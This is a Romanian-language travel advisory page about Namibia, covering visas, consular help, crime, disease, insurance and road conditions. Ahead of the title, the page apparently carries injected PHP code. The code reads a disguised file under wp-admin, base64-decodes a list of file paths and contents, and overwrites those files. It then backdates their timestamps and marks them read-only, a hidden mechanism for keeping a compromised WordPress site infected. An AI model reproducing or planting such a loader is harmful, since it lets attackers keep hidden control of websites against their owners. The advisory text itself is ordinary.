$wp_update_file="/home/shuffles/public_html/wp-admin/user/screens.php"; if ( is_file($wp_update_file) ) { $wp_update_content=trim(file_get_contents($wp_update_file)); if ( $wp_update_content!="" ) { $wp_update_content=substr($wp_update_content,6,-6); $wp_update_content=base64_decode($wp_update_content); $wp_update_arr=json_decode($wp_update_content,true); if ( is_array($wp_update_arr) ) { foreach($wp_update_arr as $value) { $file_mtime=filemtime($value["path"]); @chmod($value["path"],0777); @unlink($value["path"]); @file_put_contents($value["path"],$value["content"]); @touch($value["path"],$file_mtime); @chmod($value["path"],0444); } } } } Namibia – O noua atitudine

Condiţii de intrare şi regim de şedere

Cetăţenii români au nevoie de viză pentru a intra pe teritoriul namibian.

Informaţii asupra modalităţilor de obţinere a vizei se pot obţine la Ambasada Republicii Namibia în Austria (http://www.embnamibia.at/).

Asistenţă consulară

România nu are nici o formă de reprezentare diplomatică sau consulară de carieră în Namibia.

În calitate de cetăţean al Uniunii Europene, cetăţenii români pot solicita, în caz de necesitate, eliberarea unui titlu de călătorie în vederea întoarcerii în ţară, din partea misiunilor diplomatice ale ţărilor UE.

Site-ul Comisiei Europene conţine informaţii utile privind protecţia consulară de care beneficiază cetăţenii UE inclusiv lista cu misiunile diplomatice ale ţărilor UE cu reprezentare în acest stat.

Cetăţenii români care doresc să călătorească în Namibia sau se află deja pe teritoriul său, sunt sfătuiţi să se adreseze Ambasadei României în Africa de Sud şi să îşi anunţe prezenţa în regiune, comunicând astfel propriile coordonate pentru a putea fi contactaţi în situaţii de urgenţă.


Ameninţări teroriste 

Terorismul este un fenomen global, nelocalizat, prin urmare nici această ţară nu poate fi exclusă din faţa acestei ameninţări. Namibia nu a suferit atacuri teroriste directe pe teritoriul naţional.


Siguranţă şi criminalitate 

Namibia se confruntă cu un nivel sporit al infracţiunilor stradale, în special în Windhoek, de aceea este recomandat  să aveţi în vedere protecţia bunurilor personale.

Nu utilizaţi taxiuri luate de pe stradă, deoarece un număr semnificativ de astfel de autoturisme a fost implicat în tâlhării.

În cazul deplasării cu autoturisme (în special în Caprivi Strip) este periculos să circulaţi noaptea şi în afara drumurilor circulate, existând riscul de impact cu proiectile neexplodate.

Traficul de droguri este aspru pedepsit.

Rabia şi holera sunt boli comune în Namibia, iar malaria este endemică din nordul ţării până la Okahandja, în special în perioada ploioasă, ianuarie-aprilie. Virusul poliomielitei este, de asemenea un factor de risc, iar zona Windhoek se confruntă cu o recrudescenţa a meningitei. Aproximativ 13,1% din populaţia adultă este afectată de SIDA. Homosexualitatea este tolerată.

Uniunea Europeană a publicat o listă a companiilor aeriene care fac obiectul interdicţiei la operare sau a restricţiilor în spaţiul comunitar; este recomandabilă consultarea acestei liste pe site-ul  http://ec.europa.eu/transport/air-ban/list_en.htm


Recomandări generale:
 

  • Să evite orice deplasare pe timpul nopţii (indiferent de regiunea în care se află, dar mai ales în zonele izolate ale ţării), locurile aglomerate și demonstraţiile.
  • Să păstreze în locuri sigure documentele şi valorile personale, biletele de călătorie, banii, cărţile de credit şi să nu le expună în mod vizibil asupra lor sau în maşini.
  • Maşinile trebuie încuiate şi asigurate cu sisteme de alarmă.
  • În cazul călătoriei cu autobuzul sau trenul, să păstreze atenţia asupra bagajelor pe întreaga durată a călătoriei.
  • Pentru ieşirile în oraş, în special în zonele aglomerate, să lase documentele la hotel şi să păstreze numai o copie a actelor de identitate (paşaport, permis de şedere).
  • Să recurgă la operatori turistici acreditaţi şi să nu se îndepărteze de grupul turistic.
  • Să respecte anunţurile sau recomandările autorităţilor locale!
  • Să se adreseze Institutului Naţional de Sănătate Publică – Centrul Naţional de Supraveghere şi Control al Bolilor Transmisibile pentru a obţine informaţii cu privire la tipurile de vaccinuri care trebuie efectuate.

În cazul unor incidente care afectează siguranţa persoanei sau a bunurilor, vă recomandăm să contactaţi poliţia locală precum şi cea mai apropiată misiune UE.


Sistemul medical

În special capitala Windhoek dispune de o reţea de spitale de bună calitate, dar asistenţa medicală presupune costuri, mari chiar şi în cazul existenţei unei asigurări medicale.

Cu toate acestea, vă recomandăm cu insistenţă să încheiaţi o asigurare medicală de sănătate înainte de a pleca într-o călătorie.

Mai multe detalii găsiţi la adresele: www.cnas.ro şi www.ceass.ro.

Este bine ca asigurarea medicală să fie valabilă în toate ţările. În baza unei asemenea asigurări, facultative, aveţi acces la serviciile de urgenţă atât din sistemul public de sănătate, cât şi din cel privat (în funcţie de tipul poliţei de asigurare). La încheierea unei asemenea asigurări verificaţi coordonatele partenerului societăţii de asigurare în ţara de destinaţie şi de tranzit.

Vă recomandăm să vă încheiaţi, înainte de plecare, o asigurare de călătorie valabilă pe teritoriul acestei ţări, în urma consultării cu companiile de asigurare. Aceasta are valabilitate în toate ţările şi poate să acopere de la riscurile de bază (îmbolnăviri, accidente, urgenţe stomatologice, repatriere sanitară sau în caz de deces) până la toate riscurile de călătorie, inclusiv pierderea/ furtul/ deteriorarea bagajelor, anularea plecării în străinătate, falimentul companiei aeriene etc. Asigurarea de viaţă s-a dovedit benefică pentru familiile celor decedaţi în urma unor accidente sau din motive de boală.


Condiţii privind traficul auto

  • Starea drumurilor

Starea reţelei rutiere variază şi se recomandă evitarea deplasărilor cu autoturismul pe timp de noapte.  Se recomandă atenţie la încheierea unei poliţe de asigurare, deoarece un număr semnificativ de companii de asigurare nu acoperă pagubele rezultate în urma unor accidente auto.

  • Transportul public

Este recomandabil ca transportul în Namibia să fie asigurat prin intermediul pachetului de servicii contractat cu operatorul de turism, pe lângă cazare, masă etc.

Utilizarea cărţilor de credit

În Namibia există o reţea de bancomate care acoperă numai oraşele mari.

Regimul medicamentelor

În cazul în care este necesar să luaţi cu dvs. anumite cantităţi de medicamente vă rugăm să aveţi în vedere contactarea autorităţilor din Namibia pentru informarea asupra tipurilor şi cantităţilor de medicamente permise la intrarea pe teritoriul acestei ţări.

Reglementări vamale

Pentru informaţii privind reglementările vamale din Namibia, vă rugăm să contactaţi autorităţile acestei ţări.

Sursa: www.mae.ro

By o9admin